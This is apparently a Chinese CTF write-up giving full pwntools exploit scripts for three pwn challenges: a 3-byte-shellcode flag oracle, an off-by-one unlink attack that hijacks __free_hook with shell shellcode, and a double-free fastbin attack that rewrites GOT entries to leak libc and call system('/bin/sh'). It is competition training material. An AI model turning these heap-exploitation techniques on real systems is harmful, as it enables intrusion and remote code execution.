redhat_湖湘杯部分简单pwn 题

每个人都需要进步 我需要一步一步前进

红帽杯 pwn1

利用 3 字节 shellcode 对 flag 逐字节爆破：对每个位置依次尝试字符集中的字符，每次新建一个连接，根据服务端的返回判断该字符是否猜中。

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
# context.log_level = "debug"
# Architecture for pwntools helpers (asm()/shellcraft/p32/p64).
# NOTE(review): the addresses used in exp() (0x080F6CA0 ...) look like a 32-bit
# static binary while arch is set to amd64; the probe shellcode below is
# hand-encoded bytes, so this only matters if asm()/pack helpers are added.
context.arch = "amd64"

# Challenge binary; ``elf`` is loaded but not referenced by the visible code.
exe = './pwn'
elf = ELF(exe)

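#------------------------------------
def d(s=''):
    """Attach gdb to the global pwntools tube ``p``.

    Args:
        s: gdb command script handed to ``gdb.attach`` (default: none).
    """
    gdb.attach(p, s)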

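def exp(idx, size):
    """Run one guess of the byte-at-a-time flag oracle on the global tube ``p``.

    The service is driven through its prompts: a flag index, a 3-byte
    shellcode ``52 58 C3`` (``push edx; pop eax; ret``, or the rdx/rax form in
    64-bit mode), then a "name" of ``size`` bytes.  The guess itself is encoded
    in ``size``: the caller passes ``ord(candidate) + 1`` and the brute-force
    loop in ``__main__`` treats a '1' in the reply as a hit.
    NOTE(review): how the binary turns the shellcode/size pair into that
    yes/no answer is not visible here; confirm against the challenge binary
    before reusing this oracle.

    Args:
        idx:  0-based position in the flag being probed.
        size: requested name length; ``size - 1`` filler bytes plus the
              newline are sent.

    Returns:
        Whatever the service printed after the probe (raw str, Python 2).
        ``p`` is always closed afterwards, even if a send/recv raises, so the
        per-guess connections of the outer loop do not leak.
    """
    # Binary addresses kept from the original for reference (unused here):
    #   flag 0x080F6CA0, list 0x080F6C80, name 0x080F6CC0.
    # Printable ASCII is 33..126; __main__ restricts the alphabet further.
    try:
        p.sendlineafter('Give me a index:\n', str(idx))
        p.sendafter('Three is good number,I like it very much!\n', '\x52\x58\xC3')
        p.sendlineafter('Leave you name of size:\n', str(size))
        p.sendlineafter('Tell me:\n', 'A' * (size - 1))
        # recv() only returns what is already buffered; give the remote a
        # moment to answer first.
        sleep(0.3)
        return p.recv()
    finally:
        p.close()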

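#-------------------------------------
if __name__ == '__main__':
    # Candidate alphabet: the flag is assumed to contain only these characters.
    charset = "0123456789abcdefghijklmnopqrstuvwxyz!_{}"
    # The original "# 33" marks the flag length -- NOTE(review): confirm.
    flag_len = 33
    flag = ''
    for idx in range(flag_len):
        for ch in charset:
            # One fresh connection per guess; exp() closes it when done.
            p = remote('47.104.190.38', 12001)
            print(idx)
            print(ch)
            # The guess travels as the name size, ord(ch) + 1 (see exp()).
            ret = exp(idx, ord(ch) + 1)
            if '1' in ret:
                flag += ch
                print('----------')
                print(flag)
                print('-----------')
                break
        else:
            # No candidate matched: the alphabet is incomplete or the oracle
            # misfired.  Without this the position would be skipped silently
            # and every later character would be appended at the wrong index.
            print('[!] no match for index %d; flag so far: %s' % (idx, flag))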


#flag{1f8e093b45bbb8f4b14478b253}

湖湘杯pwn1

strlen 造成 off-by-one（可以多写一个字节，改掉下一个 chunk size 的最低字节）
在 chunk 内构造 fake chunk 触发 unlink，把 note 指针数组指向自身，然后覆盖 __free_hook ---> free_hook+8，并在其后紧接着写 shellcode（注：下面的脚本实际覆盖的是 free_hook，而不是 malloc_hook）

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
# Verbose pwntools I/O logging: every byte sent and received is echoed.
context.log_level = "debug"
# amd64 target: asm(shellcraft.sh()) and p64() in pwn() depend on this.
context.arch = "amd64"
# Challenge binary; ``elf`` is loaded but not referenced by the visible code.
exe = './HackNote'
elf = ELF(exe)

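#------------------------------------
def d(s=''):
    """Attach gdb to the global pwntools tube ``p``.

    Args:
        s: gdb command script handed to ``gdb.attach`` (default: none).
    """
    gdb.attach(p, s)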

def menu(idx):
    """Answer the menu prompt on the global tube ``p`` with choice ``idx``."""
    choice = str(idx)
    p.sendlineafter("-----------------", choice)

def add(size, content):
    """Menu 1: allocate a note of ``size`` bytes holding ``content``.

    ``content`` is sent raw (no trailing newline), so the caller decides
    exactly which bytes end up in the chunk.
    """
    menu(1)
    requested = str(size)
    p.sendlineafter('Size:\n', requested)
    p.sendafter('Note:\n', content)


def edit(idx, content):
    """Menu 3: overwrite note ``idx`` with ``content`` (sent raw, no newline)."""
    menu(3)
    slot = str(idx)
    p.sendlineafter('Index of Note:\n', slot)
    p.sendafter('Note:\n', content)

def delete(idx):
    """Menu 2: free note ``idx``."""
    menu(2)
    slot = str(idx)
    p.sendlineafter('Index of Note:\n', slot)


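def pwn():
    """Exploit HackNote: off-by-one -> unlink into the note array -> __free_hook.

    Uses the global tube ``p`` and the add/edit/delete helpers.  The
    addresses are absolute (0x6C....), which suggests a static, non-PIE
    build -- verify with checksec before reusing.

    Steps:
      1. Notes 0-4 are 0x90 chunks; note 5 (0x70) is allocated after them,
         presumably so that freeing note 4 consolidates backwards instead of
         merging into the top chunk.
      2. Note 3 is filled completely; with strlen-based copying the extra
         byte spills into the low byte of note 4's size field (the
         off-by-one named in the write-up).
      3. A fake free chunk is built at the start of note 3 (P == notes[3])
         with fd = &notes[0], bk = &notes[1], so the unlink sanity check
         fd->bk == P and bk->fd == P passes, and note 4's prev_size/size
         are forged so that free(4) unlinks P.  unlink() then sets
         notes[3] = &notes[0].
      4. edit(3) rewrites notes[0] = __free_hook; edit(0) writes
         free_hook + 8 into __free_hook followed by shellcode; free(3)
         jumps to it.  (Requires __free_hook to be executable -- check
         NX on the target.)

    Fixes the original's ``p64(__free_hook)``, which raised NameError: the
    defined constant is ``free_hook``.
    """
    free_hook = 0x6CC988
    notes = 0x6CBC40  # address of the note pointer array
    # Kept from the original for reference, not used by this path:
    #   malloc_hook = 0x6CA788, fake_size = 0x42 (0x6ca778 - 6)

    for _ in range(5):
        add(0x88, 'A' * 0x88)
    # Note 5: keeps note 4 away from the top chunk (its shellcode is unused).
    add(0x68, asm(shellcraft.sh()).ljust(0x68, 'A'))
    # Fill note 3 to the brim: the off-by-one lands in note 4's size byte.
    edit(3, 'A' * 0x88)

    # Fake chunk at P = notes[3]: size 0x81, fd/bk pointing into the note array.
    payload = 'a' * 8 + p64(0x81)
    payload += p64(notes) + p64(notes + 0x8)
    payload = payload.ljust(0x80, 'a')
    payload += p64(0x80)   # note 4 prev_size: distance back to the fake chunk
    payload += '\x90'      # note 4 size low byte: 0x91 -> 0x90, PREV_INUSE cleared
    edit(3, payload)
    # free(4) consolidates backwards and unlinks P -> notes[3] = &notes[0].
    delete(4)
    # notes[3] now aliases the array: set notes[0] = __free_hook.
    edit(3, p64(free_hook) + '\n')
    # Through notes[0]: __free_hook = free_hook + 8, shellcode right behind it.
    payload = p64(free_hook + 8) + asm(shellcraft.sh()) + '\n'
    edit(0, payload)
    # free(notes[3]) -> __free_hook -> shellcode.
    delete(3)

    p.interactive()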
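#-------------------------------------
if __name__ == '__main__':
    # 1 = run ./HackNote locally (debug with d()), 0 = attack the remote service.
    local = 1
    if local:
        p = process(exe)
    else:
        p = remote('183.129.189.62', 15704)
    # Both targets used the same libc path in the original.  pwn() does not
    # read ``libc``, but if it ever does, this file must match the remote build.
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

    pwn()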
 

pwn2

delete 之后 note 指针没有被清空（chunk 地址残留），同一个下标可以反复 free，形成 double free / fastbin dup
利用它可以把 chunk 分配到任意地址，这里用来两次修改 got 表
布置两个 fastbin attack 指向 got 表附近（0x40 和 0x60 两种大小各一个 fake chunk）
第一次把 free@got 改为 printf，利用格式化字符串（%13$p）leak libc
第二次把 free@got 改为 system，free("/bin/sh") 拿到权限

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
# Verbose pwntools I/O logging: every byte sent and received is echoed.
context.log_level = "debug"
# Default tube timeout in seconds for recv*/ *after calls.
# NOTE(review): 0.1 s is very short for a remote target; p.recv(14) in pwn()
# may return fewer than 14 bytes on a slow link and int(..., 16) then fails.
context.timeout = 0.1
# amd64 target: p64() in pwn() depends on this.
context.arch = "amd64"

# Challenge binary; ``elf`` is loaded but not referenced by the visible code.
exe = './NameSystem'
elf = ELF(exe)

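#------------------------------------
def d(s=''):
    """Attach gdb to the global pwntools tube ``p``.

    Args:
        s: gdb command script handed to ``gdb.attach`` (default: none).
    """
    gdb.attach(p, s)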

def menu(idx):
    """Answer the "choice :" prompt on the global tube ``p`` with ``idx``."""
    choice = str(idx)
    p.sendlineafter("choice :", choice)
    
def add(size, content):
    """Menu 1: allocate a name of ``size`` bytes holding ``content``.

    ``content`` is sent raw; callers append their own '\\n' when the
    program reads up to a newline.
    """
    menu(1)
    requested = str(size)
    p.sendlineafter('Size:', requested)
    p.sendafter('Name:', content)

def delete(idx):
    """Menu 3: free name ``idx`` (the program does not clear the slot)."""
    menu(3)
    slot = str(idx)
    p.sendlineafter(' delete:', slot)

def pwn():
        """Exploit NameSystem: double free -> fastbin dup into the GOT ->
        free@got = printf (format-string libc leak) -> free@got = system.

        Uses the globals ``p`` (tube) and ``libc`` (a local libc ELF whose
        symbol offsets are assumed to match the remote libc).  The exact
        delete()/add() ordering is heap grooming worked out in gdb; the
        comments describe the apparent intent and carry NOTE(review)
        markers where the intent is inferred rather than visible.
        """
        lists = 0x6020A0  # name pointer array (reference only; unused below)
        # 20 names of 0x30 bytes (0x40 chunks), all "/bin/sh": whichever one is
        # freed at the end becomes the argument once free@got points to system.
        for i in range(20):
                add(0x30, '/bin/sh\x00\n')
        # d()
        # Index 0 is freed repeatedly without being cleared: double free,
        # i.e. the same chunk can be placed in a fastbin more than once.
        for i in range(3):
                delete(0)

        # Heap grooming for the 0x40 and 0x60 fastbins.  NOTE(review): the
        # number and order of frees decides which freed chunk the next add()
        # returns; do not reorder without re-checking in gdb.
        delete(19)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(7)
        delete(0)
        delete(7)
        # Fastbin dup #1 (0x40 bin): the reused chunk's fd is set to 0x602008,
        # a fake chunk just inside the GOT whose size field (at 0x602010) is
        # written below as 0x41.
        add(0x30, p64(0x602008)+'\n')
        # d()
        # Fastbin dup #2 (0x60 bin): fake chunk at 0x602000-6, so its size
        # field is read from 0x602002 -- presumably the 0x60 byte of the
        # GOT[0] pointer (0x60xxxx) -- confirm with gdb.
        for i in range(12):
                add(0x50 , p64(0x602000-6)+'\n')

        delete(8)
        delete(8)
        delete(19)
        delete(8)
        delete(19)
        delete(8)
        delete(8)
        delete(8)
        delete(14)
        delete(8)
        delete(12)
        add(0x50 , p64(0x602000-6)+'\n')
        add(0x30,p64(0x602008)+'\n')
        # This name becomes the format string once free() is printf().
        add(0x50, '%13$p\n')
        add(0x50, '\n')
        # Allocation that lands on the 0x601FFA fake chunk (user data at
        # 0x60200A): 6 filler bytes, then 0x41 at 0x602010 (size for fake
        # chunk #1, clobbering GOT[2]), then 0x4006d0 at 0x602018 -- presumably
        # free@got -> printf@plt.  NOTE(review): verify slot and value.
        add(0x50, 'aaaaaa'+p64(0x41)+'\xd0\x06\x40'+'\x00\x00\n')
        # free(name 14) is now printf('%13$p'): leaks a stack slot.
        delete(14)
        p.recvline()
        p.recvline()
        sleep(0.5)
        p.recvuntil('want to delete:')
        # success(p.recv())
        # "0x" + 12 hex digits.  0x20830 is consistent with
        # __libc_start_main+240 on Ubuntu 16.04 glibc 2.23 -- must match the
        # remote libc, otherwise system_addr below is wrong.
        libc.address = int(p.recv(14),16) - 0x20830
        success('libc.address-->'+hex(libc.address))
        system_addr = libc.sym['system']
        success('system_addr-->'+hex(system_addr))
        add(0x30, '/bin/sh\x00\n')
        # Second copy of fake chunk #1: user data at 0x602018, overwriting
        # free@got with system and the following entry with puts.
        add(0x30, p64(system_addr)+p64(libc.sym['puts'])+'\n')
        # free("/bin/sh") == system("/bin/sh").
        delete(16)
        p.sendline('cat flag')

        p.interactive()
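#-------------------------------------
if __name__ == '__main__':
    # 1 = run ./NameSystem locally (debug with d()), 0 = attack the remote service.
    local = 0
    if local:
        p = process(exe)
    else:
        p = remote('183.129.189.62', 10505)
    # pwn() derives libc.address, system and puts from this file, so it must be
    # the same build as the target's libc; the 0x20830 leak offset in pwn() is
    # consistent with __libc_start_main+240 on Ubuntu 16.04 glibc 2.23 -- verify.
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

    pwn()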